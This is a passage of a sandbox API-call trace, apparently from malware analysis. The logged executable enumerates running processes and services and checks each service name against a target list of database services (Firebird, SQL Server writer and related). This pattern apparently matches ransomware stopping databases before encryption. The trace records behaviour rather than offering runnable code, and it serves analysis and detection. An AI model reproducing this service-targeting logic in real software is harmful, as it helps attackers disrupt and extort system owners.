lpString2="tiledatamodelsvc") returned -1 [0163.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4594008 | out: hHeap=0x6a0000) returned 1 [0163.865] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x52c [0164.151] Process32FirstW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.152] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0164.153] lstrlenW (lpString="System") returned 6 [0164.153] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0164.154] lstrlenW (lpString="smss.exe") returned 8 [0164.154] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.155] lstrlenW (lpString="csrss.exe") returned 9 [0164.155] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0164.156] lstrlenW (lpString="wininit.exe") returned 11 [0164.156] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0164.157] lstrlenW (lpString="csrss.exe") returned 9 [0164.157] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0164.158] lstrlenW (lpString="winlogon.exe") returned 12 [0164.158] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0164.159] lstrlenW (lpString="services.exe") returned 12 [0164.159] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0164.159] lstrlenW (lpString="lsass.exe") returned 9 [0164.160] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.160] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0164.160] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0164.161] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0164.161] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.162] lstrlenW (lpString="svchost.exe") returned 11 [0164.162] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.163] lstrlenW (lpString="svchost.exe") returned 11 [0164.163] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0164.164] lstrlenW (lpString="dwm.exe") returned 7 [0164.164] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.165] lstrlenW (lpString="svchost.exe") returned 11 [0164.165] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.166] lstrlenW (lpString="svchost.exe") returned 11 [0164.166] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.167] lstrlenW (lpString="svchost.exe") returned 11 [0164.167] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.168] lstrlenW (lpString="svchost.exe") returned 11 [0164.168] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.168] lstrlenW (lpString="svchost.exe") returned 11 [0164.169] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.169] lstrlenW (lpString="svchost.exe") returned 11 [0164.169] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.170] lstrlenW (lpString="svchost.exe") returned 11 [0164.170] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.171] lstrlenW (lpString="svchost.exe") returned 11 [0164.171] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.172] lstrlenW (lpString="svchost.exe") returned 11 [0164.172] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.173] lstrlenW (lpString="svchost.exe") returned 11 [0164.173] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0164.174] lstrlenW (lpString="spoolsv.exe") returned 11 [0164.174] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.175] lstrlenW (lpString="svchost.exe") returned 11 [0164.175] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0164.176] lstrlenW (lpString="audiodg.exe") returned 11 [0164.176] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0164.177] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0164.177] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0164.177] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0164.177] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0164.178] lstrlenW (lpString="Memory Compression") returned 18 [0164.178] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0164.180] lstrlenW (lpString="sihost.exe") returned 10 [0164.180] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0164.181] lstrlenW (lpString="svchost.exe") returned 11 [0164.181] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0164.181] lstrlenW (lpString="msoia.exe") returned 9 [0164.182] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.182] lstrlenW (lpString="taskhostw.exe") returned 13 [0164.182] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0164.183] lstrlenW (lpString="explorer.exe") returned 12 [0164.183] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0164.184] lstrlenW (lpString="SearchUI.exe") returned 12 [0164.184] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0164.185] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0164.185] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0164.186] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0164.186] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.187] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0164.187] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0164.188] lstrlenW (lpString="hgaibc.exe") returned 10 [0164.188] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0164.189] lstrlenW (lpString="cmd.exe") returned 7 [0164.189] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0164.190] lstrlenW (lpString="conhost.exe") returned 11 [0164.190] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0164.190] lstrlenW (lpString="mode.com") returned 8 [0164.191] Process32NextW (in: hSnapshot=0x52c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0164.191] CloseHandle (hObject=0x52c) returned 1 [0164.191] Sleep (dwMilliseconds=0x1f4) [0164.877] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c358 [0164.878] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0164.879] GetLastError () returned 0xea [0164.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4594008 [0164.879] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4594008, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4594008, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0164.880] CloseServiceHandle (hSCObject=0x458c358) returned 1 [0164.881] lstrlenW (lpString="Appinfo") returned 7 [0164.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0164.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0164.881] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0164.881] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0164.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0164.881] lstrlenW (lpString="AppXSvc") returned 7 [0164.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0164.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0164.881] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0164.881] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0164.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0164.881] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0164.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0164.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0164.881] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0164.881] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0164.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0164.881] lstrlenW (lpString="Audiosrv") returned 8 [0164.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0164.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0164.881] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0164.882] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0164.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0164.882] lstrlenW (lpString="BFE") returned 3 [0164.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0164.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0164.882] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0164.882] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0164.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0164.882] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0164.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0164.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0164.882] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0164.882] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0164.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0164.882] lstrlenW (lpString="CDPSvc") returned 6 [0164.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0164.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0164.882] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0164.882] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0164.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0164.882] lstrlenW (lpString="ClickToRunSvc") returned 13 [0164.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0164.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0164.882] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0164.882] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0164.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0164.882] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0164.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0164.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0164.883] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0164.883] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0164.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0164.883] lstrlenW (lpString="CryptSvc") returned 8 [0164.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0164.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0164.883] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0164.883] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0164.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0164.885] lstrlenW (lpString="DcomLaunch") returned 10 [0164.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0164.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0164.885] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0164.885] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0164.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0164.885] lstrlenW (lpString="DeviceAssociationService") returned 24 [0164.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0164.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0164.885] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0164.885] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0164.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0164.885] lstrlenW (lpString="Dhcp") returned 4 [0164.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0164.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0164.885] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0164.885] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0164.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0164.885] lstrlenW (lpString="Dnscache") returned 8 [0164.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0164.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0164.885] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0164.885] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0164.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0164.885] lstrlenW (lpString="DPS") returned 3 [0164.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0164.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0164.886] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0164.886] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0164.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0164.886] lstrlenW (lpString="DusmSvc") returned 7 [0164.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0164.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0164.886] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0164.886] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0164.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0164.886] lstrlenW (lpString="EventLog") returned 8 [0164.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0164.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0164.886] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0164.886] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0164.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0164.886] lstrlenW (lpString="EventSystem") returned 11 [0164.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0164.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0164.886] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0164.886] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0164.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0164.886] lstrlenW (lpString="FontCache") returned 9 [0164.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0164.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 